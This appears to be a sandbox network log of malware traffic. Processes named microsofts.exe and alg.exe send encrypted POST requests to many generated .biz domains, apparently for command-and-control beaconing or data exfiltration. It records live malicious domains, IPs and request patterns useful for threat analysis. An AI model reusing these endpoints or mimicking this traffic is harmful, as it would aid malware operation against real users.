Oct 20, 2024 18:42:15.781613111 CEST	778	OUT	Data Raw: ae 93 57 61 35 11 ea c6 fe 02 00 00 a4 f0 00 50 50 f8 50 fa b2 bd 9a 00 63 28 72 71 99 24 dc d6 61 d0 d1 1e ee 5a ba 5e c4 dd b7 3a 0a f4 96 ff 51 f0 1f 10 f6 58 62 4c 61 bd 3d 35 3f b7 72 96 66 9e 75 ad 59 f1 54 83 cf 69 52 3c 47 4c 6c 3a 75 30 Data Ascii: Wa5PPPc(rq$aZ^:QXbLa=5?rfuYTiR<GLl:u0<&0]Nw3l.Ob,#[Zus)7kH>d-Qgz;vn&cC0t)jWC?RN\U(6-l+]ehnf%u3!hE=Dr;C#
Oct 20, 2024 18:42:16.653161049 CEST	170	IN	HTTP/1.1 200 OK Date: Sun, 20 Oct 2024 16:42:16 GMT Content-Length: 94 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Oct 20, 2024 18:42:16.705369949 CEST	347	OUT	POST /ewwexq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:16.705410004 CEST	778	OUT	Data Raw: 39 5e 7d e7 08 79 db 03 fe 02 00 00 7f fa 64 74 cb 4f 6c 6d 0c 4c 6f 44 52 14 cb 1f fc 37 cb f0 83 fa 0c 81 cc 89 f9 47 f7 5d fc 00 dc d0 83 d4 98 83 d7 d8 7d 55 5a 21 18 5b 7f a0 dd d7 81 69 b7 e4 13 29 50 dd b7 9d c1 af 33 13 9a 7f 19 28 4f 02 Data Ascii: 9^}ydtOlmLoDR7G]}UZ![i)P3(OY$n*$E!x'ju_q3p%6}`N~TJs}U;;H_f'R!OZn5)H9pNH3^NyHP4\iT,ebJ}+kO9J
Oct 20, 2024 18:42:16.884191990 CEST	170	IN	HTTP/1.1 200 OK Date: Sun, 20 Oct 2024 16:42:16 GMT Content-Length: 94 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49876	18.208.156.248	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:15.908880949 CEST	356	OUT	POST /jbtgiilqotksodi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:15.908915043 CEST	826	OUT	Data Raw: 9e c9 cc 29 15 ba 3b 5c 2e 03 00 00 f6 e6 56 cb 97 4b 3e 71 6e 2a b0 83 bd 90 7f 2f 4f 32 b8 5c 22 73 3f 3d e2 a1 ba ae 2f 05 e2 7c 4b ae 4c f6 8a 9b 56 19 79 90 e5 2f e5 1b 55 bb 93 7e 11 48 99 1a 56 b7 27 e9 c0 42 cc 43 1f c9 b8 66 32 f7 03 c8 Data Ascii: );\.VK>qn/O2\"s?=/\|KLVy/U~HV'BCf2{bN+U.J(]wn/]<=0#j88od/Vt,Z-"K@#k@>7^}6g#Bl{VwGv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49882	208.100.26.245	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:16.865411043 CEST	348	OUT	POST /hvyr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:16.865423918 CEST	826	OUT	Data Raw: 73 39 27 cb 0a 79 95 36 2e 03 00 00 79 0e c4 c5 e8 28 3e e2 37 7f f1 33 e8 ce 97 30 15 4c 6b 1b 7d 84 01 37 37 28 9a 63 a4 f0 74 ee b9 c5 16 8c 0a 2c 55 a8 60 c9 6d fd 56 cd a4 81 d0 d7 2e 52 b0 bb ce ef f5 68 3c 87 4d a8 35 cd 15 9c 74 3d 3f 24 Data Ascii: s9'y6.y(>730Lk}77(ct,U`mV.Rh<M5t=?$Qgrsob%0I:vG#.f0`iil$S5<Wa_?Ym6L5+>jb/,6FYkcSu,!%npeQOJ2_c
Oct 20, 2024 18:42:17.718204975 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 20 Oct 2024 16:42:17 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49884	54.244.188.177	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:17.175287008 CEST	359	OUT	POST /uyciffjgsguvtk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:17.175319910 CEST	778	OUT	Data Raw: 94 d5 a5 6f 93 11 88 3f fe 02 00 00 6c 33 16 19 24 5a de 9d b0 19 dc ae 94 c5 1d 85 8d 57 2a eb 88 fd b0 a1 3b 6d ad 88 18 60 11 a1 b2 8d db 4b a9 54 64 07 f0 ad c2 43 3d ed 5a 06 cd d4 7b e2 6c cc 4f 78 27 5f a0 cc 62 c0 4f 68 53 86 cf ca c1 7f Data Ascii: o?l3$ZW*;m`KTdC=Z{lOx'_bOhSY>jct;et{#^J.\ BqGo2jMo #5~ZL:r9wIK]&I"1&#eX2hEW7R[x>VU/wviFEF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49888	208.100.26.245	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:17.764877081 CEST	360	OUT	POST /smxlcsofdvekwjcg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:17.764913082 CEST	826	OUT	Data Raw: 8f ea f6 e9 78 85 67 11 2e 03 00 00 73 e3 b4 e5 95 2c c9 35 b4 7b 95 93 f8 9b 89 8c 81 8d 4f 1a 95 a4 60 ad 80 b9 e8 e9 4e 67 3f 64 80 95 c7 eb f6 2f 1b 57 b2 55 0a 11 64 de 65 62 9a 89 9a 34 8d ea 7c 94 d1 56 8b b1 9d 81 38 4a ec 80 6a d9 cd c9 Data Ascii: xg.s,5{O`Ng?d/WUdeb4\|V8JjKX9Qq1..ewQN%oV 7X<Hp)YyT1bMlTB?@#Mfa nPqqv\1>
Oct 20, 2024 18:42:18.629755974 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 20 Oct 2024 16:42:18 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49890	54.244.188.177	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:18.175440073 CEST	352	OUT	POST /hlqwiqs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:18.175474882 CEST	778	OUT	Data Raw: 56 cb 90 c0 e1 db 8b 94 fe 02 00 00 00 45 cb 3a 0e bb 50 1d 1d 17 64 cc d6 21 91 27 51 70 49 e7 e8 31 5b 9c 5a 49 22 40 3e ec 7b 47 66 92 a0 c0 be 23 be 4f 0c 5e 6c cd bd 4d 79 27 32 5d 7c 24 08 81 8c a7 3e 1d 70 5f 19 bb 69 8b ee e4 4c 99 93 e2 Data Ascii: VE:Pd!'QpI1[ZI"@>{Gf#O^lMy'2]\|$>p_iL\Z&xw/vJ$Z5>('6(o8\|mrlQ9tWIEel5D+^=7)-5,XYT8;Rh$ovfJT" Ez

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49895	13.251.16.150	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:18.698743105 CEST	354	OUT	POST /kpfmyendmvbe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qaynky.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:18.698798895 CEST	826	OUT	Data Raw: eb f8 a3 9a 81 57 60 12 2e 03 00 00 5f e1 63 7a a4 03 09 4a 2c b0 8a 46 40 c1 6d fc a5 4d e3 f2 91 25 19 db 2e 2f 4e 93 d6 df 16 ae 7c cf 5d 7c e1 31 09 76 4d 8f 11 ce 01 b3 87 cf 9b e1 04 a8 0d 41 a7 4a 1a 18 53 ca f6 15 5a bb f0 84 9c 43 78 70 Data Ascii: W`._czJ,F@mM%./N\|]\|1vMAJSZCxp<-]Yt,<x@jl+)5r,[@7{?MRp9lnd'~uH!!0\LhsW<NDR/UTV2! 8c>iKutl'Y
Oct 20, 2024 18:42:20.239083052 CEST	412	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:42:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=16f80d28d6ef2161e8973dbeedcda501\|96.44.151.125\|1729442539\|1729442539\|0\|1\|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49896	44.221.84.105	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:20.339451075 CEST	350	OUT	POST /uitbt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: bumxkqgxu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:20.339473963 CEST	826	OUT	Data Raw: 87 26 72 07 0e 16 51 99 2e 03 00 00 44 50 53 42 11 29 ed 47 8d ad 57 d6 a8 d9 50 24 4f db 73 a5 4b fe 03 ae 5b 6b 57 50 9e f7 30 85 98 6e 16 ef c5 0e 02 e8 29 d0 c7 78 04 54 b2 b6 28 78 4d fd 47 61 95 2f 55 cc d6 82 52 bd d6 ab 45 c6 08 c6 42 37 Data Ascii: &rQ.DPSB)GWP$OsK[kWP0n)xT(xMGa/UREB7g\|mh:CG?LT~q`Vg]]-<u&v-Oc Nz[sW%3y<i:Bgx+wPC]LTA-&y?YM/AM/"_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49902	208.100.26.245	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:20.833517075 CEST	349	OUT	POST /jfogdd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:20.833625078 CEST	778	OUT	Data Raw: ce 51 12 60 77 22 7b cf fe 02 00 00 14 82 df d7 c5 e2 c7 c2 37 18 b3 0c b3 73 74 a8 c9 d7 12 0d a9 12 c6 1b f1 8b 5f 77 43 08 a6 8b d0 2a 90 d3 b7 2d 42 6d e5 5e e9 19 5a 65 c9 78 99 29 44 e1 cd 3f 51 f1 fd 29 32 a0 26 c6 de 02 22 e7 b9 6a 3c 1b Data Ascii: Q`w"{7st_wC-Bm^Zex)D?Q)2&"j<WB^$]Fs~GMd{.<?i-mp@cn:c9^p^BkuW#B5*Artd~iUs<f.sV{N.@JvK
Oct 20, 2024 18:42:22.219472885 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 20 Oct 2024 16:42:22 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 20, 2024 18:42:22.265017986 CEST	347	OUT	POST /eaff HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:22.265119076 CEST	778	OUT	Data Raw: 23 25 b1 85 12 f9 8b 31 fe 02 00 00 29 ca aa b5 62 9c fb 64 e5 99 74 4d 9f 66 4a 52 34 8a 95 9c 85 fd 88 14 43 0c a1 ff 1c 48 75 6d b6 b2 31 0d 13 56 30 c5 ec 3a cb 0e e5 a3 2c 24 fe 8c d0 0c 8e 7c 2e f7 9c af 74 49 eb f6 ad 72 ef 6f fd 96 a9 09 Data Ascii: #%1)bdtMfJR4CHum1V0:,$\|.tIrozgz/f1SQr +7~VR7o?"4MhL;jLH\ n&T:?PFHH'pbCDtMxXo4?E9>>&+e@3
Oct 20, 2024 18:42:22.480981112 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 20 Oct 2024 16:42:22 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49908	44.221.84.105	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:22.307254076 CEST	354	OUT	POST /dhaqnsepv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: bumxkqgxu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:22.307272911 CEST	826	OUT	Data Raw: 28 6b df fa b7 05 7c 23 2e 03 00 00 3b 2f 71 d1 52 06 6a 1a 3c d9 05 9d 22 fa 2a 07 be c2 94 72 67 74 83 a8 d0 c3 c1 b1 28 06 cb 59 b3 7a 3f 43 e3 6f 4b 9d e2 f2 f4 fb 56 4e b5 92 94 49 63 10 36 1f 51 aa f0 31 49 b3 13 97 3d 6b 14 f6 17 04 0b 14 Data Ascii: (k\|#.;/qRj<"rgt(Yz?CoKVNIc6Q1I=ka~UBg-aS/prDy_wZ#_V,A#$!\|FMoGE+3v!JF5jfQ@x(D~sZa<4G*SvQ~
Oct 20, 2024 18:42:23.978856087 CEST	415	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:42:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=035a8aef702f4a0ba2eb87fa46850aa3\|96.44.151.125\|1729442543\|1729442543\|0\|1\|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 20, 2024 18:42:23.980539083 CEST	415	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:42:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=035a8aef702f4a0ba2eb87fa46850aa3\|96.44.151.125\|1729442543\|1729442543\|0\|1\|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 20, 2024 18:42:23.981681108 CEST	415	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:42:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=035a8aef702f4a0ba2eb87fa46850aa3\|96.44.151.125\|1729442543\|1729442543\|0\|1\|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49911	34.211.97.45	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:22.822174072 CEST	357	OUT	POST /gkyxxtcmyqyikvyh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jpskm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:22.822199106 CEST	778	OUT	Data Raw: 9d a5 46 e2 84 71 a2 d3 fe 02 00 00 58 df 8f 78 ce 4b 0c d5 56 b7 e9 ba 00 a4 0f f8 db 69 d2 89 e9 7b 2d 7a 00 c8 2d da bf 0d 90 20 2f b5 84 c2 50 5c 64 c8 cc a9 9b 9e e1 38 e2 d5 86 ec f5 79 0c 41 8a 43 58 b8 13 0d 0e 43 83 f0 21 ec d4 f3 6d c7 Data Ascii: FqXxKVi{-z- /P\d8yACXC!m-g{Qc[<a<3Dx3OHV}5{:\|$X[$80NktfnnGFEE7 z]HYktfJ 6TxV' NTE?2m<=8t^QS%~X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49914	54.244.188.177	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
